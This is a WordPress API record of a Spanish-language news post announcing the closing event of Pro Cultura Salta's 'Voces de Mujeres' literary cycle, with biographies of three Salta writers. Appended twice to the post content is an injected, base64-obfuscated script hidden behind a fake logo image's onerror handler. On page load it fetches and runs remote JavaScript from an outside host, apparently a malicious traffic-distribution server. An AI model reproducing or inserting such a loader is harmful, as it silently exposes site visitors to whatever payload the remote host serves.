{"id":2017,"date":"2022-12-29T11:07:30","date_gmt":"2022-12-29T14:07:30","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2017"},"modified":"2025-08-14T00:26:43","modified_gmt":"2025-08-14T03:26:43","slug":"hoy-se-realizara-el-cierre-del-ciclo-voces-de-mujeres","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2017","title":{"rendered":"Hoy se realizar\u00e1 el cierre del ciclo \u201cVoces de Mujeres\u201d"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#6b0720\"><em>Este jueves a las 20:30, finalizar\u00e1 el ciclo de PRO Cultura Salta destinado a la difusi\u00f3n, presentaci\u00f3n y lectura de obras de escritoras que han marcado con su estilo literario y compromiso social una manera de ver la realidad.<\/em><\/h4>\n\n\n\n<p>El ciclo \u201cVoces de Mujeres\u201d realizar\u00e1 su cierre hoy&nbsp;jueves 29 de diciembre a las 20.30 en la Sala \u201cSilvio Segal\u201d de Pro Cultura Salta, ubicado en calle Mitre 331.<\/p>\n\n\n\n<p>En esta oportunidad se presentar\u00e1n:&nbsp;<strong>Elisa Moyano<\/strong>,&nbsp;<strong>Ana de Anqu\u00edn<\/strong>&nbsp;y se brindar\u00e1 un reconocimiento a la trayectoria literaria de&nbsp;<strong>Mercedes Saravia Toledo<\/strong>. Las escritoras presentar\u00e1n sus \u00faltimos libros y compartir\u00e1n sus experiencias a lo largo de su ejercicio acad\u00e9mico y literario con entrada libre y gratuita.<\/p>\n\n\n\n<p>Elisa Moyano es autora de libros colectivos e individuales entre los que figuran su reciente producci\u00f3n \u201cEl libro de la antepasadas\u201d: Ha recibido el Premio Walter Adet por su libro \u201cLa edad del por qu\u00e9\u201d. Es licenciada en Letras de la Universidad Nacional de Salta y Mag\u00edster en Estudios Latinoamericanos de la Universidad Andina Sim\u00f3n Bol\u00edvar de Ecuador.<\/p>\n\n\n\n<p>Ana de Anqu\u00edn particip\u00f3 de la hoja de poes\u00eda Resquicios www.edisalta.ar\/Cdsalta\/resquicios\/index.html y Antolog\u00edas de narrativa y poes\u00eda (1996-2003). Editora honoraria de la Revista Tramas\/Maepova. Autora y coautora de libros y art\u00edculos sobre formaci\u00f3n docente, educaci\u00f3n rural intercultural. Mercedes Saravia public\u00f3 los libros de poes\u00eda: Mendiga Luz (1991) y Plaza Desierto (1993). Ambos premiados por la Direcci\u00f3n de Cultura de la Provincia, como as\u00ed tambi\u00e9n el cuadernillo de poes\u00eda Emily y otros poemas (2006). \u00abFILAMENTOS\u00bb (2010) fue el primer premio de poes\u00eda, distinguido por el Ministerio de Turismo y Cultura de la Provincia. Particip\u00f3 en Manifiesto Po\u00e9tico (1986), en Hojas de Poes\u00eda (1987-1991) y Por la tierra y el cielo (1996).<\/p>\n\n\n\n<p>Mercedes Saravia Toledo naci\u00f3 en Salta el 24 de setiembre de 1951. Licenciada en Psicolog\u00eda, con formaci\u00f3n psicoanal\u00edtica.<\/p>\n\n\n\n<p>Fue docente del Instituto Oscar Masotta y&nbsp;miembro del Consejo de redacci\u00f3n de la revista Diagonal (para la difusi\u00f3n del Psicoan\u00e1lisis en la cultura).<\/p>\n\n\n\n<p>Public\u00f3 los libros de poes\u00eda: Mendiga Luz (1991) y Plaza Desierto(1993). Ambos premiados por la Direcci\u00f3n&nbsp; de Cultura de la Provincia. Y el cuadernillo de poes\u00eda Emily y otros poemas(2006). \u00abFILAMENTOS\u00bb 2010 &#8211; primer premio de poes\u00eda para autores editos del Ministerio de Turismo y Cultura de la Provincia.<\/p>\n\n\n\n<p>Particip\u00f3 en Manifiesto po\u00e9tico(1986), en Hojas de Poes\u00eda(1987-1991) y&nbsp; Por la tierra y el cielo(1996).&nbsp;En 2003 dirigi\u00f3&nbsp;la edici\u00f3n de la musa malsana ( hoja de poes\u00eda resQuicios y pliegos de poes\u00eda). En 2006&nbsp; la Colecci\u00f3n de poes\u00eda La chu\u00f1a y en 2007 la editorial Invitaci\u00f3n a la dalia.<\/p>\n\n\n\n<p>En el \u00e1rea de la pl\u00e1stica, realiz\u00f3 tres muestras individuales:&nbsp; 1999 en la Galer\u00eda Indalo, 2001 en el Museo Provincial de Bellas Artes. En 2010 \u00abPoemas para mirar\u00bb en Luna Verde (Paseo de los poestas) . Particip\u00f3 en muestras colectivas.<\/p>\n\n\n\n<p>Pro Cultura Salta es una Asociaci\u00f3n civil sin fines de lucro, que se mantiene a trav\u00e9s de la colaboraci\u00f3n de socios institucionales, socios individuales, socios adherentes, socios fundadores y socios honorarios, m\u00e1s el aporte econ\u00f3mico de empresas que auspician los eventos organizados por la instituci\u00f3n. Su finalidad es la de propender a la elevaci\u00f3n y desarrollo del nivel cultural de la poblaci\u00f3n de la Provincia<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/hoy-se-realizara-el-cierre-del-ciclo-voces-de-mujeres-86995\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Este jueves a las 20:30, finalizar\u00e1 el ciclo de PRO Cultura Salta destinado a la difusi\u00f3n, presentaci\u00f3n y lectura de obras de escritoras que han marcado con su estilo literario y compromiso social una manera de ver la realidad. El ciclo \u201cVoces de Mujeres\u201d realizar\u00e1 su cierre hoy&nbsp;jueves 29 de diciembre a las 20.30 en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2018,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-2017","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2017"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2017"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2017\/revisions"}],"predecessor-version":[{"id":7225,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2017\/revisions\/7225"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2018"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2017"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2017"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2017"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}